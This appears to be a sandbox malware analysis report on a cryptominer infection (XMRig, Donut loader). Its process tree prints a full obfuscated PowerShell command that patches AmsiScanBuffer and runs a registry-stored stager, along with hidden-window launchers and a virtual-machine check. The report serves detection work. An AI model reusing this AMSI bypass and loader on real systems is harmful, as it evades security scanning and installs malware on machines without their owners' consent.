  • powershell.exe (PID: 5464 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+'at'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ivpgsCMtihnowdNIBeH=kveHNQwSSGcg @([String])([IntPtr]);$jwUlbRJyRtiCsTvojnOrQR=kveHNQwSSGcg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mpyIpGuEmdK=$gFfWslPcsIxEF.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$scqjgRcUiQSTBu=$xRDavNIGnzLLon.Invoke($Null,@([Object]$mpyIpGuEmdK,[Object](''+[Char](76)+''+'o'+'adL'+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$CTojssOdwpNmEymGb=$xRDavNIGnzLLon.Invoke($Null,@([Object]$mpyIpGuEmdK,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$ssgLTbT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($scqjgRcUiQSTBu,$ivpgsCMtihnowdNIBeH).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+'.d'+'l'+''+[Char](108)+'');$EVtyXOreozsddqFlq=$xRDavNIGnzLLon.Invoke($Null,@([Object]$ssgLTbT,[Object](''+'A'+'m'+'s'+''+'i'+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+''+'u'+'f'+'f'+''+'e'+''+[Char](114)+'')));$vxbtwyzgyD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CTojssOdwpNmEymGb,$jwUlbRJyRtiCsTvojnOrQR).Invoke($EVtyXOreozsddqFlq,[uint32]8,4,[ref]$vxbtwyzgyD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EVtyXOreozsddqFlq,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CTojssOdwpNmEymGb,$jwUlbRJyRtiCsTvojnOrQR).Invoke($EVtyXOreozsddqFlq,[uint32]8,0x20,[ref]$vxbtwyzgyD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+'x'+'-'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 5880 cmdline: C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
  • powershell.exe (PID: 6612 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+''+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vKwAkflJKGpUwNhZmaw=YrWHxoHyNMxl @([String])([IntPtr]);$qJXsDxxmTbuQfbUlnZoHlQ=YrWHxoHyNMxl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OQuoHIIkLqL=$XabpoaxiZGEGR.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+'3'+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$VQjNvPkAQyhVaI=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$OQuoHIIkLqL,[Object]('Lo'+[Char](97)+''+'d'+''+[Char](76)+'ib'+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$qfeujwJPycmGjtIGB=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$OQuoHIIkLqL,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+''+'o'+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$VjfjPYd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VQjNvPkAQyhVaI,$vKwAkflJKGpUwNhZmaw).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+'l');$ZjZDXRvDVpnzBqGGH=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$VjfjPYd,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$fXogPYmCjI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qfeujwJPycmGjtIGB,$qJXsDxxmTbuQfbUlnZoHlQ).Invoke($ZjZDXRvDVpnzBqGGH,[uint32]8,4,[ref]$fXogPYmCjI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZjZDXRvDVpnzBqGGH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qfeujwJPycmGjtIGB,$qJXsDxxmTbuQfbUlnZoHlQ).Invoke($ZjZDXRvDVpnzBqGGH,[uint32]8,0x20,[ref]$fXogPYmCjI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+'r'+[Char](98)+''+'x'+'-'+[Char](115)+'t'+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 7528 cmdline: C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • powershell.exe (PID: 4240 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+'ddre'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+'b'+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$LYPstsFMvGDueCuqqFR=NyGuwfckeOJe @([String])([IntPtr]);$RBrwyhNopgzaGFyXfoYzuU=NyGuwfckeOJe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ngqAWkNvnUU=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+[Char](110)+''+[Char](101)+'l'+'3'+'2'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ViSGjgKFWHOvJi=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$ngqAWkNvnUU,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'yA')));$ErlOnVIeWPbCnQNFG=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$ngqAWkNvnUU,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$JKCdsPm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ViSGjgKFWHOvJi,$LYPstsFMvGDueCuqqFR).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'dll');$iERkOmaiRJGubWlVw=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$JKCdsPm,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+'f'+'e'+[Char](114)+'')));$aRThctnmCd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ErlOnVIeWPbCnQNFG,$RBrwyhNopgzaGFyXfoYzuU).Invoke($iERkOmaiRJGubWlVw,[uint32]8,4,[ref]$aRThctnmCd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iERkOmaiRJGubWlVw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ErlOnVIeWPbCnQNFG,$RBrwyhNopgzaGFyXfoYzuU).Invoke($iERkOmaiRJGubWlVw,[uint32]8,0x20,[ref]$aRThctnmCd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'AR'+'E'+'').GetValue(''+'$'+''+[Char](114)+''+'b'+''+[Char](120)+''+'-'+''+'s'+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 4912 cmdline: C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • cmd.exe (PID: 7788 cmdline: cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2968 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 1868 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 1736 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 6564 cmdline: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cmd.exe (PID: 6248 cmdline: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4832 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 2424 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3672 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2676 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 3068 cmdline: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cmd.exe (PID: 1264 cmdline: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5564 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 6344 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7968 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 1028 cmdline: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x38b6:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_5c38878dunknownunknown
    • 0x400d:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1
    0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x45a1f0:$a1: mining.set_target
      • 0x454f38:$a2: XMRIG_HOSTNAME
      • 0x457018:$a3: Usage: xmrig [OPTIONS]
      • 0x454f10:$a4: XMRIG_VERSION
      0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Click to see the 59 entries

        Sigma Signatures

        Bitcoin Miner

        barindex
        Sigma detected: Xmrig
